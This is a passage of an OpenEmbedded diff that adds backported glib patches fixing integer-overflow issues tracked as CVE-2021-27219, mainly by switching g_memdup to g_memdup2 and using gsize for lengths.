127- test_data = g_memdup (&data, sizeof (TestParamImplementData));
128+ test_data = g_memdup2 (&data, sizeof (TestParamImplementData));
129 g_test_add_data_func_full (test_path, test_data, test_param_implement_child, g_free);
130 g_free (test_path);
131 }
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch
new file mode 100644
index 0000000000..6a3ac6b552
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch
@@ -0,0 +1,298 @@
1Backport of:
2
3From 0736b7c1e7cf4232c5d7eb2b0fbfe9be81bd3baa Mon Sep 17 00:00:00 2001
4From: Philip Withnall <pwithnall@endlessos.org>
5Date: Thu, 4 Feb 2021 13:41:21 +0000
6Subject: [PATCH 04/11] glib: Use g_memdup2() instead of g_memdup() in obvious
7 places
8MIME-Version: 1.0
9Content-Type: text/plain; charset=UTF-8
10Content-Transfer-Encoding: 8bit
11
12Convert all the call sites which use `g_memdup()`’s length argument
13trivially (for example, by passing a `sizeof()` or an existing `gsize`
14variable), so that they use `g_memdup2()` instead.
15
16In almost all of these cases the use of `g_memdup()` would not have
17caused problems, but it will soon be deprecated, so best port away from
18it
19
20In particular, this fixes an overflow within `g_bytes_new()`, identified
21as GHSL-2021-045 by GHSL team member Kevin Backhouse.
22
23Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
24Fixes: GHSL-2021-045
25Helps: #2319
26
27Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
28CVE: CVE-2021-27219
29Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
30Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
31
32---
33 glib/gbytes.c | 6 ++++--
34 glib/gdir.c | 3 ++-
35 glib/ghash.c | 7 ++++---
36 glib/giochannel.c | 5 +++--
37 glib/gslice.c | 3 ++-
38 glib/gtestutils.c | 3 ++-
39 glib/gvariant.c | 7 ++++---
40 glib/gvarianttype.c | 3 ++-
41 glib/tests/array-test.c | 4 +++-
42 glib/tests/option-context.c | 6 ++++--
43 glib/tests/uri.c | 8 +++++---
44 11 files changed, 35 insertions(+), 20 deletions(-)
45
46--- a/glib/gbytes.c
47+++ b/glib/gbytes.c
48@@ -34,6 +34,8 @@
49
50 #include <string.h>
51
52+#include "gstrfuncsprivate.h"
53+
54 /**
55 * GBytes:
56 *
57@@ -95,7 +97,7 @@ g_bytes_new (gconstpointer data,
58 {
59 g_return_val_if_fail (data != NULL || size == 0, NULL);
60
61- return g_bytes_new_take (g_memdup (data, size), size);
62+ return g_bytes_new_take (g_memdup2 (data, size), size);
63 }
64
65 /**
66@@ -499,7 +501,7 @@ g_bytes_unref_to_data (GBytes *bytes,
67 * Copy: Non g_malloc (or compatible) allocator, or static memory,
68 * so we have to copy, and then unref.
69 */
70- result = g_memdup (bytes->data, bytes->size);
71+ result = g_memdup2 (bytes->data, bytes->size);
72 *size = bytes->size;
73 g_bytes_unref (bytes);
74 }
75--- a/glib/gdir.c
76+++ b/glib/gdir.c
77@@ -37,6 +37,7 @@
78 #include "gconvert.h"
79 #include "gfileutils.h"
80 #include "gstrfuncs.h"
81+#include "gstrfuncsprivate.h"
82 #include "gtestutils.h"
83 #include "glibintl.h"
84
85@@ -112,7 +113,7 @@ g_dir_open_with_errno (const gchar *path
86 return NULL;
87 #endif
88
89- return g_memdup (&dir, sizeof dir);
90+ return g_memdup2 (&dir, sizeof dir);
91 }
92
93 /**
94--- a/glib/ghash.c
95+++ b/glib/ghash.c
96@@ -34,6 +34,7 @@
97 #include "gmacros.h"
98 #include "glib-private.h"
99 #include "gstrfuncs.h"
100+#include "gstrfuncsprivate.h"
101 #include "gatomic.h"
102 #include "gtestutils.h"
103 #include "gslice.h"
104@@ -962,7 +963,7 @@ g_hash_table_ensure_keyval_fits (GHashTa
105 if (hash_table->have_big_keys)
106 {
107 if (key != value)
108- hash_table->values = g_memdup (hash_table->keys, sizeof (gpointer) * hash_table->size);
109+ hash_table->values = g_memdup2 (hash_table->keys, sizeof (gpointer) * hash_table->size);
110 /* Keys and values are both big now, so no need for further checks */
111 return;
112 }
113@@ -970,7 +971,7 @@ g_hash_table_ensure_keyval_fits (GHashTa
114 {
115 if (key != value)
116 {
117- hash_table->values = g_memdup (hash_table->keys, sizeof (guint) * hash_table->size);
118+ hash_table->values = g_memdup2 (hash_table->keys, sizeof (guint) * hash_table->size);
119 is_a_set = FALSE;
120 }
121 }
122@@ -998,7 +999,7 @@ g_hash_table_ensure_keyval_fits (GHashTa
123
124 /* Just split if necessary */
125 if (is_a_set && key != value)
126- hash_table->values = g_memdup (hash_table->keys, sizeof (gpointer) * hash_table->size);
127+ hash_table->values = g_memdup2 (hash_table->keys, sizeof (gpointer) * hash_table->size);
128
129 #endif
130 }
131--- a/glib/giochannel.c
132+++ b/glib/giochannel.c
133@@ -35,7 +35,7 @@
134 #include <errno.h>
135
136 #include "giochannel.h"
137-
138+#include "gstrfuncsprivate.h"
139 #include "gstrfuncs.h"
140 #include "gtestutils.h"
141 #include "glibintl.h"
142
143@@ -1673,10 +1674,10 @@ g_io_channel_read_line (GIOChannel *cha
144
145 /* Copy the read bytes (including any embedded nuls) and nul-terminate.
146 * `USE_BUF (channel)->str` is guaranteed to be nul-terminated as it’s a
147- * #GString, so it’s safe to call g_memdup() with +1 length to allocate
148+ * #GString, so it’s safe to call g_memdup2() with +1 length to allocate
149 * a nul-terminator. */
150 g_assert (USE_BUF (channel));
151- line = g_memdup (USE_BUF (channel)->str, got_length + 1);
152+ line = g_memdup2 (USE_BUF (channel)->str, got_length + 1);
153 line[got_length] = '\0';
154 *str_return = g_steal_pointer (&line);
155 g_string_erase (USE_BUF (channel), 0, got_length);
156--- a/glib/gslice.c
157+++ b/glib/gslice.c
158@@ -41,6 +41,7 @@
159 #include "gmain.h"
160 #include "gmem.h" /* gslice.h */
161 #include "gstrfuncs.h"
162+#include "gstrfuncsprivate.h"
163 #include "gutils.h"
164 #include "gtrashstack.h"
165 #include "gtestutils.h"
166@@ -350,7 +351,7 @@ g_slice_get_config_state (GSliceConfig c
167 array[i++] = allocator->contention_counters[address];
168 array[i++] = allocator_get_magazine_threshold (allocator, address);
169 *n_values = i;
170- return g_memdup (array, sizeof (array[0]) * *n_values);
171+ return g_memdup2 (array, sizeof (array[0]) * *n_values);
172 default:
173 return NULL;
174 }
175--- a/glib/gtestutils.c
176+++ b/glib/gtestutils.c
177@@ -49,6 +49,7 @@
178 #include "gpattern.h"
179 #include "grand.h"
180 #include "gstrfuncs.h"
181+#include "gstrfuncsprivate.h"
182 #include "gtimer.h"
183 #include "gslice.h"
184 #include "gspawn.h"
185@@ -3803,7 +3804,7 @@ g_test_log_extract (GTestLogBuffer *tbuf
186 if (p <= tbuffer->data->str + mlength)
187 {
188 g_string_erase (tbuffer->data, 0, mlength);
189- tbuffer->msgs = g_slist_prepend (tbuffer->msgs, g_memdup (&msg, sizeof (msg)));
190+ tbuffer->msgs = g_slist_prepend (tbuffer->msgs, g_memdup2 (&msg, sizeof (msg)));
191 return TRUE;
192 }
193
194--- a/glib/gvariant.c
195+++ b/glib/gvariant.c
196@@ -33,6 +33,7 @@
197
198 #include <string.h>
199
200+#include "gstrfuncsprivate.h"
201
202 /**
203 * SECTION:gvariant
204@@ -725,7 +726,7 @@ g_variant_new_variant (GVariant *value)
205 g_variant_ref_sink (value);
206
207 return g_variant_new_from_children (G_VARIANT_TYPE_VARIANT,
208- g_memdup (&value, sizeof value),
209+ g_memdup2 (&value, sizeof value),
210 1, g_variant_is_trusted (value));
211 }
212
213@@ -1229,7 +1230,7 @@ g_variant_new_fixed_array (const GVarian
214 return NULL;
215 }
216
217- data = g_memdup (elements, n_elements * element_size);
218+ data = g_memdup2 (elements, n_elements * element_size);
219 value = g_variant_new_from_data (array_type, data,
220 n_elements * element_size,
221 FALSE, g_free, data);
222@@ -1908,7 +1909,7 @@ g_variant_dup_bytestring (GVariant *valu
223 if (length)
224 *length = size;
225
226- return g_memdup (original, size + 1);
227+ return g_memdup2 (original, size + 1);
228 }
229
230 /**
231--- a/glib/gvarianttype.c
232+++ b/glib/gvarianttype.c
233@@ -28,6 +28,7 @@
234
235 #include <string.h>
236
237+#include "gstrfuncsprivate.h"
238
239 /**
240 * SECTION:gvarianttype
241@@ -1181,7 +1182,7 @@ g_variant_type_new_tuple (const GVariant
242 g_assert (offset < sizeof buffer);
243 buffer[offset++] = ')';
244
245- return (GVariantType *) g_memdup (buffer, offset);
246+ return (GVariantType *) g_memdup2 (buffer, offset);
247 }
248
249 /**
250--- a/glib/tests/array-test.c
251+++ b/glib/tests/array-test.c
252@@ -29,6 +29,8 @@
253 #include <string.h>
254 #include "glib.h"
255
256+#include "gstrfuncsprivate.h"
257+
258 /* Test data to be passed to any function which calls g_array_new(), providing
259 * the parameters for that call. Most #GArray tests should be repeated for all
260 * possible values of #ArrayTestData. */
261@@ -1917,7 +1919,7 @@ byte_array_new_take (void)
262 GByteArray *gbarray;
263 guint8 *data;
264
265- data = g_memdup ("woooweeewow", 11);
266+ data = g_memdup2 ("woooweeewow", 11);
267 gbarray = g_byte_array_new_take (data, 11);
268 g_assert (gbarray->data == data);
269 g_assert_cmpuint (gbarray->len, ==, 11);
270--- a/glib/tests/option-context.c
271+++ b/glib/tests/option-context.c
272@@ -27,6 +27,8 @@
273 #include <string.h>
274 #include <locale.h>
275
276+#include "gstrfuncsprivate.h"
277+
278 static GOptionEntry main_entries[] = {
279 { "main-switch", 0, 0,
280 G_OPTION_ARG_NONE, NULL,
281@@ -256,7 +258,7 @@ join_stringv (int argc, char **argv)
282 static char **
283 copy_stringv (char **argv, int argc)
284 {
285- return g_memdup (argv, sizeof (char *) * (argc + 1));
286+ return g_memdup2 (argv, sizeof (char *) * (argc + 1));
287 }
288
289 static void
290@@ -2323,7 +2325,7 @@ test_group_parse (void)
291 g_option_context_add_group (context, group);
292
293 argv = split_string ("program --test arg1 -f arg2 --group-test arg3 --frob arg4 -z arg5", &argc);
294- orig_argv = g_memdup (argv, (argc + 1) * sizeof (char *));
295+ orig_argv = g_memdup2 (argv, (argc + 1) * sizeof (char *));
296
297 retval = g_option_context_parse (context, &argc, &argv, &error);
298
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch
new file mode 100644
index 0000000000..4f86522d00
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch
@@ -0,0 +1,54 @@
1From 0cbad673215ec8a049b7fe2ff44b0beed31b376e Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Thu, 4 Feb 2021 16:12:24 +0000
4Subject: [PATCH 05/11] gwinhttpfile: Avoid arithmetic overflow when
5 calculating a size
6MIME-Version: 1.0
7Content-Type: text/plain; charset=UTF-8
8Content-Transfer-Encoding: 8bit
9
10The members of `URL_COMPONENTS` (`winhttp_file->url`) are `DWORD`s, i.e.
1132-bit unsigned integers. Adding to and multiplying them may cause them
12to overflow the unsigned integer bounds, even if the result is passed to
13`g_memdup2()` which accepts a `gsize`.
14
15Cast the `URL_COMPONENTS` members to `gsize` first to ensure that the
16arithmetic is done in terms of `gsize`s rather than unsigned integers.
17
18Spotted by Sebastian Dröge.
19
20Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
21Helps: #2319
22
23Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
24CVE: CVE-2021-27219
25Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
26Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
27
28---
29 gio/win32/gwinhttpfile.c | 8 ++++----
30 1 file changed, 4 insertions(+), 4 deletions(-)
31
32diff --git a/gio/win32/gwinhttpfile.c b/gio/win32/gwinhttpfile.c
33index 3f8fbd838..e0340e247 100644
34--- a/gio/win32/gwinhttpfile.c
35+++ b/gio/win32/gwinhttpfile.c
36@@ -410,10 +410,10 @@ g_winhttp_file_resolve_relative_path (GFile *file,
37 child = g_object_new (G_TYPE_WINHTTP_FILE, NULL);
38 child->vfs = winhttp_file->vfs;
39 child->url = winhttp_file->url;
40- child->url.lpszScheme = g_memdup2 (winhttp_file->url.lpszScheme, (winhttp_file->url.dwSchemeLength+1)*2);
41- child->url.lpszHostName = g_memdup2 (winhttp_file->url.lpszHostName, (winhttp_file->url.dwHostNameLength+1)*2);
42- child->url.lpszUserName = g_memdup2 (winhttp_file->url.lpszUserName, (winhttp_file->url.dwUserNameLength+1)*2);
43- child->url.lpszPassword = g_memdup2 (winhttp_file->url.lpszPassword, (winhttp_file->url.dwPasswordLength+1)*2);
44+ child->url.lpszScheme = g_memdup2 (winhttp_file->url.lpszScheme, ((gsize) winhttp_file->url.dwSchemeLength + 1) * 2);
45+ child->url.lpszHostName = g_memdup2 (winhttp_file->url.lpszHostName, ((gsize) winhttp_file->url.dwHostNameLength + 1) * 2);
46+ child->url.lpszUserName = g_memdup2 (winhttp_file->url.lpszUserName, ((gsize) winhttp_file->url.dwUserNameLength + 1) * 2);
47+ child->url.lpszPassword = g_memdup2 (winhttp_file->url.lpszPassword, ((gsize) winhttp_file->url.dwPasswordLength + 1) * 2);
48 child->url.lpszUrlPath = wnew_path;
49 child->url.dwUrlPathLength = wcslen (wnew_path);
50 child->url.lpszExtraInfo = NULL;
51--
52GitLab
53
54
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch
new file mode 100644
index 0000000000..d8043f5e29
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch
@@ -0,0 +1,101 @@
1From f9ee2275cbc312c0b4cdbc338a4fbb76eb36fb9a Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Thu, 4 Feb 2021 13:49:00 +0000
4Subject: [PATCH 06/11] gdatainputstream: Handle stop_chars_len internally as
5 gsize
6
7Previously it was handled as a `gssize`, which meant that if the
8`stop_chars` string was longer than `G_MAXSSIZE` there would be an
9overflow.
10
11Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
12Helps: #2319
13
14Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
15CVE: CVE-2021-27219
16Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
17Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
18
19---
20 gio/gdatainputstream.c | 25 +++++++++++++++++--------
21 1 file changed, 17 insertions(+), 8 deletions(-)
22
23diff --git a/gio/gdatainputstream.c b/gio/gdatainputstream.c
24index 2e7750cb5..2cdcbda19 100644
25--- a/gio/gdatainputstream.c
26+++ b/gio/gdatainputstream.c
27@@ -27,6 +27,7 @@
28 #include "gioenumtypes.h"
29 #include "gioerror.h"
30 #include "glibintl.h"
31+#include "gstrfuncsprivate.h"
32
33 #include <string.h>
34
35@@ -856,7 +857,7 @@ static gssize
36 scan_for_chars (GDataInputStream *stream,
37 gsize *checked_out,
38 const char *stop_chars,
39- gssize stop_chars_len)
40+ gsize stop_chars_len)
41 {
42 GBufferedInputStream *bstream;
43 const char *buffer;
44@@ -952,7 +953,7 @@ typedef struct
45 gsize checked;
46
47 gchar *stop_chars;
48- gssize stop_chars_len;
49+ gsize stop_chars_len;
50 gsize length;
51 } GDataInputStreamReadData;
52
53@@ -1078,12 +1079,17 @@ g_data_input_stream_read_async (GDataInputStream *stream,
54 {
55 GDataInputStreamReadData *data;
56 GTask *task;
57+ gsize stop_chars_len_unsigned;
58
59 data = g_slice_new0 (GDataInputStreamReadData);
60- if (stop_chars_len == -1)
61- stop_chars_len = strlen (stop_chars);
62- data->stop_chars = g_memdup (stop_chars, stop_chars_len);
63- data->stop_chars_len = stop_chars_len;
64+
65+ if (stop_chars_len < 0)
66+ stop_chars_len_unsigned = strlen (stop_chars);
67+ else
68+ stop_chars_len_unsigned = (gsize) stop_chars_len;
69+
70+ data->stop_chars = g_memdup2 (stop_chars, stop_chars_len_unsigned);
71+ data->stop_chars_len = stop_chars_len_unsigned;
72 data->last_saw_cr = FALSE;
73
74 task = g_task_new (stream, cancellable, callback, user_data);
75@@ -1338,17 +1344,20 @@ g_data_input_stream_read_upto (GDataInputStream *stream,
76 gssize found_pos;
77 gssize res;
78 char *data_until;
79+ gsize stop_chars_len_unsigned;
80
81 g_return_val_if_fail (G_IS_DATA_INPUT_STREAM (stream), NULL);
82
83 if (stop_chars_len < 0)
84- stop_chars_len = strlen (stop_chars);
85+ stop_chars_len_unsigned = strlen (stop_chars);
86+ else
87+ stop_chars_len_unsigned = (gsize) stop_chars_len;
88
89 bstream = G_BUFFERED_INPUT_STREAM (stream);
90
91 checked = 0;
92
93- while ((found_pos = scan_for_chars (stream, &checked, stop_chars, stop_chars_len)) == -1)
94+ while ((found_pos = scan_for_chars (stream, &checked, stop_chars, stop_chars_len_unsigned)) == -1)
95 {
96 if (g_buffered_input_stream_get_available (bstream) ==
97 g_buffered_input_stream_get_buffer_size (bstream))
98--
99GitLab
100
101
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch
new file mode 100644
index 0000000000..f183939c45
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch
@@ -0,0 +1,76 @@
1From 2aaf593a9eb96d84fe3be740aca2810a97d95592 Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Thu, 4 Feb 2021 13:50:37 +0000
4Subject: [PATCH 07/11] gwin32: Use gsize internally in g_wcsdup()
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9This allows it to handle strings up to length `G_MAXSIZE` — previously
10it would overflow with such strings.
11
12Update the several copies of it identically.
13
14Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
15Helps: #2319
16
17Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
18CVE: CVE-2021-27219
19Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
20Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
21
22---
23 gio/gwin32registrykey.c | 34 ++++++++++++++++++++++++++--------
24 2 files changed, 38 insertions(+), 16 deletions(-)
25
26diff --git a/gio/gwin32registrykey.c b/gio/gwin32registrykey.c
27index 548a94188..2eb67daf8 100644
28--- a/gio/gwin32registrykey.c
29+++ b/gio/gwin32registrykey.c
30@@ -127,16 +127,34 @@ typedef enum
31 G_WIN32_REGISTRY_UPDATED_PATH = 1,
32 } GWin32RegistryKeyUpdateFlag;
33
34+static gsize
35+g_utf16_len (const gunichar2 *str)
36+{
37+ gsize result;
38+
39+ for (result = 0; str[0] != 0; str++, result++)
40+ ;
41+
42+ return result;
43+}
44+
45 static gunichar2 *
46-g_wcsdup (const gunichar2 *str,
47- gssize str_size)
48+g_wcsdup (const gunichar2 *str, gssize str_len)
49 {
50- if (str_size == -1)
51- {
52- str_size = wcslen (str) + 1;
53- str_size *= sizeof (gunichar2);
54- }
55- return g_memdup (str, str_size);
56+ gsize str_len_unsigned;
57+ gsize str_size;
58+
59+ g_return_val_if_fail (str != NULL, NULL);
60+
61+ if (str_len < 0)
62+ str_len_unsigned = g_utf16_len (str);
63+ else
64+ str_len_unsigned = (gsize) str_len;
65+
66+ g_assert (str_len_unsigned <= G_MAXSIZE / sizeof (gunichar2) - 1);
67+ str_size = (str_len_unsigned + 1) * sizeof (gunichar2);
68+
69+ return g_memdup2 (str, str_size);
70 }
71
72 /**
73--
74GitLab
75
76
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch
new file mode 100644
index 0000000000..ffafc35c07
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch
@@ -0,0 +1,101 @@
1From ba8ca443051f93a74c0d03d62e70402036f967a5 Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Thu, 4 Feb 2021 13:58:32 +0000
4Subject: [PATCH 08/11] gkeyfilesettingsbackend: Handle long keys when
5 converting paths
6
7Previously, the code in `convert_path()` could not handle keys longer
8than `G_MAXINT`, and would overflow if that was exceeded.
9
10Convert the code to use `gsize` and `g_memdup2()` throughout, and
11change from identifying the position of the final slash in the string
12using a signed offset `i`, to using a pointer to the character (and
13`strrchr()`). This allows the slash to be at any position in a
14`G_MAXSIZE`-long string, without sacrificing a bit of the offset for
15indicating whether a slash was found.
16
17Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
18Helps: #2319
19
20Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
21CVE: CVE-2021-27219
22Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
23Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
24
25---
26 gio/gkeyfilesettingsbackend.c | 21 ++++++++++-----------
27 1 file changed, 10 insertions(+), 11 deletions(-)
28
29diff --git a/gio/gkeyfilesettingsbackend.c b/gio/gkeyfilesettingsbackend.c
30index cd5765afd..25b057672 100644
31--- a/gio/gkeyfilesettingsbackend.c
32+++ b/gio/gkeyfilesettingsbackend.c
33@@ -33,6 +33,7 @@
34 #include "gfilemonitor.h"
35 #include "gsimplepermission.h"
36 #include "gsettingsbackendinternal.h"
37+#include "gstrfuncsprivate.h"
38 #include "giomodule-priv.h"
39 #include "gportalsupport.h"
40
41@@ -145,8 +146,8 @@ convert_path (GKeyfileSettingsBackend *kfsb,
42 gchar **group,
43 gchar **basename)
44 {
45- gint key_len = strlen (key);
46- gint i;
47+ gsize key_len = strlen (key);
48+ const gchar *last_slash;
49
50 if (key_len < kfsb->prefix_len ||
51 memcmp (key, kfsb->prefix, kfsb->prefix_len) != 0)
52@@ -155,38 +156,36 @@ convert_path (GKeyfileSettingsBackend *kfsb,
53 key_len -= kfsb->prefix_len;
54 key += kfsb->prefix_len;
55
56- for (i = key_len; i >= 0; i--)
57- if (key[i] == '/')
58- break;
59+ last_slash = strrchr (key, '/');
60
61 if (kfsb->root_group)
62 {
63 /* if a root_group was specified, make sure the user hasn't given
64 * a path that ghosts that group name
65 */
66- if (i == kfsb->root_group_len && memcmp (key, kfsb->root_group, i) == 0)
67+ if (last_slash != NULL && (last_slash - key) == kfsb->root_group_len && memcmp (key, kfsb->root_group, last_slash - key) == 0)
68 return FALSE;
69 }
70 else
71 {
72 /* if no root_group was given, ensure that the user gave a path */
73- if (i == -1)
74+ if (last_slash == NULL)
75 return FALSE;
76 }
77
78 if (group)
79 {
80- if (i >= 0)
81+ if (last_slash != NULL)
82 {
83- *group = g_memdup (key, i + 1);
84- (*group)[i] = '\0';
85+ *group = g_memdup2 (key, (last_slash - key) + 1);
86+ (*group)[(last_slash - key)] = '\0';
87 }
88 else
89 *group = g_strdup (kfsb->root_group);
90 }
91
92 if (basename)
93- *basename = g_memdup (key + i + 1, key_len - i);
94+ *basename = g_memdup2 (last_slash + 1, key_len - (last_slash - key));
95
96 return TRUE;
97 }
98--
99GitLab
100
101
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch
new file mode 100644
index 0000000000..8efb7c720f
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch
@@ -0,0 +1,100 @@
1From 65ec7f4d6e8832c481f6e00e2eb007b9a60024ce Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Thu, 4 Feb 2021 14:00:53 +0000
4Subject: [PATCH 09/11] =?UTF-8?q?gsocket:=20Use=20gsize=20to=20track=20nat?=
5 =?UTF-8?q?ive=20sockaddr=E2=80=99s=20size?=
6MIME-Version: 1.0
7Content-Type: text/plain; charset=UTF-8
8Content-Transfer-Encoding: 8bit
9
10Don’t use an `int`, that’s potentially too small. In practical terms,
11this is not a problem, since no socket address is going to be that big.
12
13By making these changes we can use `g_memdup2()` without warnings,
14though. Fewer warnings is good.
15
16Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
17Helps: #2319
18
19Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
20CVE: CVE-2021-27219
21Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
22Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
23
24---
25 gio/gsocket.c | 16 ++++++++++------
26 1 file changed, 10 insertions(+), 6 deletions(-)
27
28--- a/gio/gsocket.c
29+++ b/gio/gsocket.c
30@@ -75,6 +75,7 @@
31 #include "gcredentialsprivate.h"
32 #include "glibintl.h"
33 #include "gioprivate.h"
34+#include "gstrfuncsprivate.h"
35
36 #ifdef G_OS_WIN32
37 /* For Windows XP runtime compatibility, but use the system's if_nametoindex() if available */
38@@ -174,7 +175,7 @@ static gboolean g_socket_datagram_ba
39 GError **error);
40
41 static GSocketAddress *
42-cache_recv_address (GSocket *socket, struct sockaddr *native, int native_len);
43+cache_recv_address (GSocket *socket, struct sockaddr *native, size_t native_len);
44
45 static gssize
46 g_socket_receive_message_with_timeout (GSocket *socket,
47@@ -260,7 +261,7 @@ struct _GSocketPrivate
48 struct {
49 GSocketAddress *addr;
50 struct sockaddr *native;
51- gint native_len;
52+ gsize native_len;
53 guint64 last_used;
54 } recv_addr_cache[RECV_ADDR_CACHE_SIZE];
55 };
56@@ -5259,14 +5260,14 @@ g_socket_send_messages_with_timeout (GSo
57 }
58
59 static GSocketAddress *
60-cache_recv_address (GSocket *socket, struct sockaddr *native, int native_len)
61+cache_recv_address (GSocket *socket, struct sockaddr *native, size_t native_len)
62 {
63 GSocketAddress *saddr;
64 gint i;
65 guint64 oldest_time = G_MAXUINT64;
66 gint oldest_index = 0;
67
68- if (native_len <= 0)
69+ if (native_len == 0)
70 return NULL;
71
72 saddr = NULL;
73@@ -5274,7 +5275,7 @@ cache_recv_address (GSocket *socket, str
74 {
75 GSocketAddress *tmp = socket->priv->recv_addr_cache[i].addr;
76 gpointer tmp_native = socket->priv->recv_addr_cache[i].native;
77- gint tmp_native_len = socket->priv->recv_addr_cache[i].native_len;
78+ gsize tmp_native_len = socket->priv->recv_addr_cache[i].native_len;
79
80 if (!tmp)
81 continue;
82@@ -5304,7 +5305,7 @@ cache_recv_address (GSocket *socket, str
83 g_free (socket->priv->recv_addr_cache[oldest_index].native);
84 }
85
86- socket->priv->recv_addr_cache[oldest_index].native = g_memdup (native, native_len);
87+ socket->priv->recv_addr_cache[oldest_index].native = g_memdup2 (native, native_len);
88 socket->priv->recv_addr_cache[oldest_index].native_len = native_len;
89 socket->priv->recv_addr_cache[oldest_index].addr = g_object_ref (saddr);
90 socket->priv->recv_addr_cache[oldest_index].last_used = g_get_monotonic_time ();
91@@ -5452,6 +5453,9 @@ g_socket_receive_message_with_timeout (G
92 /* do it */
93 while (1)
94 {
95+ /* addrlen has to be of type int because that’s how WSARecvFrom() is defined */
96+ G_STATIC_ASSERT (sizeof addr <= G_MAXINT);
97+
98 addrlen = sizeof addr;
99 if (address)
100 result = WSARecvFrom (socket->priv->fd,
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch
new file mode 100644
index 0000000000..63fda0b600
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch
@@ -0,0 +1,59 @@
1From 777b95a88f006d39d9fe6d3321db17e7b0d4b9a4 Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Thu, 4 Feb 2021 14:07:39 +0000
4Subject: [PATCH 10/11] gtlspassword: Forbid very long TLS passwords
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9The public API `g_tls_password_set_value_full()` (and the vfunc it
10invokes) can only accept a `gssize` length. Ensure that nul-terminated
11strings passed to `g_tls_password_set_value()` can’t exceed that length.
12Use `g_memdup2()` to avoid an overflow if they’re longer than
13`G_MAXUINT` similarly.
14
15Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
16Helps: #2319
17
18Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
19CVE: CVE-2021-27219
20Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
21Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
22
23---
24 gio/gtlspassword.c | 10 ++++++++--
25 1 file changed, 8 insertions(+), 2 deletions(-)
26
27diff --git a/gio/gtlspassword.c b/gio/gtlspassword.c
